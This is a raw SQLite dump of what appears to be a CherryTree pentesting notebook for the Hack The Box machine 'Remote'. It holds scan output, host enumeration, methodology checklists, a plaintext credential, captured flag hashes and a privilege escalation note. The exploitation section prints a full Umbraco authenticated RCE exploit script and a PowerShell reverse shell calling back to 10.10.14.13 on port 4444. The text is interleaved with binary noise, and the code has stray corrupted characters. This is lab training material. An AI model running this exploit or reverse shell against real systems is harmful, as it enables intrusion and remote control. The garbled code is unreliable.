SQLite format 3@ 7-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Auk!' 10.10.10.Xcustom-colors$A[Y)A[Y}xj#'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 13:24 EDT Nmap scan report for 10.10.10.180 Host is up (0.058s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 11, &Iak '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2 )' Q)7'  Dirb\DirBuster$ gobuster dir -w /usr/share/dirb/4m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX $Lv)' K)+'  Script ResultsS C:\Users\Public> tasklist /svq/'  Post Exploitationcustom-colors*AIZnn(%y'  ExploitationService Exploited: Vulnerability Type: Exploit Pl'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad yyX/]'  Running Proces&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Q+-u'  Host InformationOperating System Architecture Domain Installed Updates Host Name: REMOTE OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 OS Manufact O\ G'   NetworkIPConfig\IFConfig Network Processes ARP Process Listcustom-colors$AIwqp)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg Q^Qg'  Goodiescustom-colorsVA?& c++e'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt FileService Exploited: Service I)c'  Scheduled JobsScheduled Taskscustom-colors$ANl NN# A'  Passwordsadmin@htb.local : baconandcheesecustom-colors$A4,j%I#i' Methodologytype user.txt 8125ad90b00e35b97851cf3478693845 type c:\users\administrator\desktop\root.txt 93b6da05bb6ec8999c5dd4e546865423 custom-colors$A /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xs/'  Proof\Flags\Othercustom-colors$Au%f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAh  ' Log Bookcustom-colors(AI^c Image Name PID Services ========================= ======== ============================================ System Idle Process 0 N/A System 4 N/A Registry 104 N/A smss.exe 324 N/A csrss.exe 408 N/A wininit.exe 488 N/A csrss.exe 504 N/A winlogon.exe 588 N/A services.exe 596 N/A lsass.exe 652 KeyIso, SamSs svchost.exe 776 PlugPlay  svchost.exe 800 BrokerInfrastructure, DcomLaunch, Power, SystemEventsBroker fontdrvhost.exe 824 N/A fontdrvhost.exe 832 N/A svchost.exe 916 RpcEptMapper, RpcSs svchost.exe 960 LSM dwm.exe 84 N/A svchost.exe 312 DsmSvc svchost.exe 956 NcbService svchost.exe 1080 TimeBrokerSvc svchost.exe 1100 EventLog svchost.exe 1224 CoreMessagingRegistrar svchost.exe 1276 nsi svchost.exe 1336 gpsvc svchost.exe 1352 Dhcp vmacthlp.exe 1400 VMware Physical Disk Helper Service svchost.exe 1472 NlaSvc svchost.exe 1484 Schedule svchost.exe 1528 ProfSvc svchost.exe 1544 EventSystem svchost.exe 1552 Themes svchost.exe 1664 SENS svchost.exe 1728 netprofm svchost.exe 1760 Wcmsvc svchost.exe 1772 Dnscache svchost.exe  1880 ShellHWDetection svchost.exe 1964 FontCache svchost.exe 1236 BFE, mpssvc svchost.exe 1268 UserManager svchost.exe 1536 WinHttpAutoProxySvc svchost.exe 2072 LanmanWorkstation svchost.exe 2280 IKEEXT svchost.exe 2288 PolicyAgent spoolsv.exe 2684 Spooler svchost.exe 2748 AppHostSvc svchost.exe 2756 CryptSvc svchost.exe 2764 DiagTrack svchost.exe 2780 ftpsvc  inetinfo.exe 2808 IISADMIN svchost.exe 2816 Winmgmt svchost.exe 2876 SstpSvc svchost.exe 2904 SysMain svchost.exe 2916 LanmanServer svchost.exe 3008 TrkWks TeamViewer_Service.exe 3028 TeamViewer7 svchost.exe 3052 W3SVC, WAS VGAuthService.exe 3060 VGAuthService svchost.exe 3068 W32Time vmtoolsd.exe 1816 VMTools svchost.exe 3076 WpnService svchost.exe 3084 WinRM  MsMpEng.exe 3092 WinDefend svchost.exe 3136 iphlpsvc nfssvc.exe 3228 NfsService svchost.exe 3416 RasMan dllhost.exe 4200 COMSysApp msdtc.exe 4368 MSDTC WmiPrvSE.exe 4680 N/A LogonUI.exe 4980 N/A svchost.exe 5840 lmhosts svchost.exe 4804 CDPSvc svchost.exe 5256 DPS svchost.exe 5548 UALSVC svchost.exe 4744 UsoSvc SearchIndexer.exe 1768 WSearch svchost.exe 1232 StateRepository svchost.exe 3868 DsSvc svchost.exe 5004 PcaSvc w3wp.exe 3816 N/A powershell.exe 2260 N/A conhost.exe 1580 N/A scp.exe 5104 N/A ssh.exe 5444 N/A powershell.exe 4792 N/A conhost.exe 4452 N/A tasklist.exe 4556 N/A custom-colorsXAIZ|xAF7Lmpersonation Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability tasklist /srv USOSVC Exploit Code Used https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA#x!urer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00429-00521-62775-AA801 Original Install Date: 2/19/2020, 4:03:29 PM System Boot Time: 9/5/2020, 1:22:13 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 4 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory:" C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 4,095 MB Available Physical Memory: 2,416 MB Virtual Memory: Max Size: 4,799 MB Virtual Memory: Available: 2,943 MB Virtual Memory: In Use: 1,856 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 5 Hotfix(s) Installed. [01]: KB4534119 [02]: KB4462930 [03]: KB4516115 [04]: KB4523204 [05]: KB4464455 Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 # DHCP Enabled: No IP address(es) [01]: 10.10.10.180 [02]: fe80::f9dc:5c8:8d13:416c [03]: dead:beef::f9dc:5c8:8d13:416c Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. tasklist /svc Image Name PID Services ========================= ======== ============================================ System Idle Process 0 N/A System 4 N/A Registry 104 N/A smss.exe 324 N/A csrss.exe 408 N/A wininit.exe 488 N/A $ csrss.exe 504 N/A winlogon.exe 588 N/A services.exe 596 N/A lsass.exe 652 KeyIso, SamSs svchost.exe 776 PlugPlay svchost.exe 800 BrokerInfrastructure, DcomLaunch, Power, SystemEventsBroker fontdrvhost.exe 824 N/A fontdrvhost.exe 832 N/A svchost.exe 916 RpcEptMapper, RpcSs svchost.exe 960 LSM dwm.exe 84 N/A svchost.exe 312 DsmSvc % svchost.exe 956 NcbService svchost.exe 1080 TimeBrokerSvc svchost.exe 1100 EventLog svchost.exe 1224 CoreMessagingRegistrar svchost.exe 1276 nsi svchost.exe 1336 gpsvc svchost.exe 1352 Dhcp vmacthlp.exe 1400 VMware Physical Disk Helper Service svchost.exe 1472 NlaSvc svchost.exe 1484 Schedule svchost.exe 1528 ProfSvc svchost.exe 1544 EventSystem svchost.exe 1552 Th&emes svchost.exe 1664 SENS svchost.exe 1728 netprofm svchost.exe 1760 Wcmsvc svchost.exe 1772 Dnscache svchost.exe 1880 ShellHWDetection svchost.exe 1964 FontCache svchost.exe 1236 BFE, mpssvc svchost.exe 1268 UserManager svchost.exe 1536 WinHttpAutoProxySvc svchost.exe 2072 LanmanWorkstation svchost.exe 2280 IKEEXT svchost.exe 2288 PolicyAgent spoolsv.exe ' 2684 Spooler svchost.exe 2748 AppHostSvc svchost.exe 2756 CryptSvc svchost.exe 2764 DiagTrack svchost.exe 2780 ftpsvc inetinfo.exe 2808 IISADMIN svchost.exe 2816 Winmgmt svchost.exe 2876 SstpSvc svchost.exe 2904 SysMain svchost.exe 2916 LanmanServer svchost.exe 3008 TrkWks TeamViewer_Service.exe 3028 TeamViewer7 svchost.exe 3052 W3SVC, WAS ( VGAuthService.exe 3060 VGAuthService svchost.exe 3068 W32Time vmtoolsd.exe 1816 VMTools svchost.exe 3076 WpnService svchost.exe 3084 WinRM MsMpEng.exe 3092 WinDefend svchost.exe 3136 iphlpsvc nfssvc.exe 3228 NfsService svchost.exe 3416 RasMan dllhost.exe 4200 COMSysApp msdtc.exe 4368 MSDTC WmiPrvSE.exe 4680 N/A LogonUI.exe 4980 N/A ) svchost.exe 5840 lmhosts svchost.exe 4804 CDPSvc svchost.exe 5256 DPS svchost.exe 5548 UALSVC svchost.exe 4744 UsoSvc SearchIndexer.exe 1768 WSearch svchost.exe 1232 StateRepository svchost.exe 3868 DsSvc svchost.exe 5004 PcaSvc w3wp.exe 3816 N/A powershell.exe 2260 N/A conhost.exe 1580 N/A scp.exe 5104 N/*A ssh.exe 5444 N/A powershell.exe 4792 N/A conhost.exe 4452 N/A powershell.exe 4324 N/A powershell.exe 4296 N/A conhost.exe 3660 N/A powershell.exe 2312 N/A powershell.exe 4620 N/A conhost.exe 1304 N/A cmd.exe 1844 N/A powershell.exe 4704 N/A conhost.exe 4080 N/A svchost.exe 6020 wlidsvc svchost.exe 2828 ClipSVC tasklist.exe 1780 N/A whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled custom-colors$AO  G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*-1/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m48s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-05T17:31:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 274.31 seconds custom-colors*A M QQ3%'  ExploitationService Exploited: Umbraco Vulnerability Type: Auth RCE Exploit POC: https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py Description: Discovery of Vulnerability https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.pyS C:\Users\Public> tasklist /svq/'  Post Exploitationcustom-colors*AIZnn0ext> Searchsploit Exploit Code Used $ cat exploit.py # Exploit Title: Umbraco CMS - Authenticated Remote Code Execution # Date: 2020-03-28 # Exploit Author: Alexandre ZANNI (noraj) # Based on: https://www.exploit-db.com/exploits/46153 # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig import requests import re import argparse from bs4 import BeautifulSoup pa1rser = argparse.ArgumentParser(prog='exploit.py', description='Umbraco authenticated RCE', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80)) parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email') parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password') parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL') parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command') parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='') args = parser.parse_args() # Payload payload = """\ <?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="ht2tp://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\ """ % (args.arguments, args.command) login = args.user password = args.pa3ssword host = args.url # Process Login url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" loginfo = { "username": login, "password": password} s = requests.session() r2 = s.post(url_login,json=loginfo) # Go to vulnerable web page url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx" r3 = s.get(url_xslt) soup = BeautifulSoup(r3.text, 'html.parser') VIEWSTATE = soup.find(id="__VIEWSTATE")['value'] VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'] UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'] headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN} data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT&quot; } # Launch the attack r4 = s.post(url_xslt, data=data, headers=headers) # Filter output soup = BeautifulSoup(r4.text, 'html.parser') CMDOUTPUT = soup.find(id="result").getText() print(CMDOUTPUT) $ cat powerreverse.ps1 $client = New-Object System.Net.Sockets.TCPClient("10.10.14.13",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() $nc -lvnp 4444 Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AxA5wordlists/big.txt -u http://10.10.10.180 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.180 [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/05 13:30:06 Starting gobuster =============================================================== /1111 (Status: 200) /Home (Status: 200) /Blog (Status: 200) /Products (Status: 200) [ERROR] 2020/09/05 13:30:28 [!] Get http://10.10.10.180/Contact: net/http: request canceled (Client.Timeout exceeded while awaiting headers) /People (Status: 200) [ERROR] 2020/09/05 13:30:48 [!] Get http://10.10.10.180/about-us: net/http: request canceled (Client.Timeout exceeded while awaiting headers) /blog (Status: 200) /contact (Status: 200) /home (Status: 200) /install (Status: 302) /intranet (Status: 200) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldsite2: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldsitefiles: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldsites: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldstore: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldstats: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldstuff: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldweb: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldwebsite: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/oldwebstats: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/09/05 13:34:06 [!] Get http://10.10.10.180/ole: net/http: request canceled (Client.Timeout exceeded while awaiting headers) /people (Status: 200) /person (Status: 200) /products (Status: 200) /umbraco (Status: 200) =============================================================== 2020/09/05 13:36:11 Finished =============================================================== custom-colors$A?&xA'~ff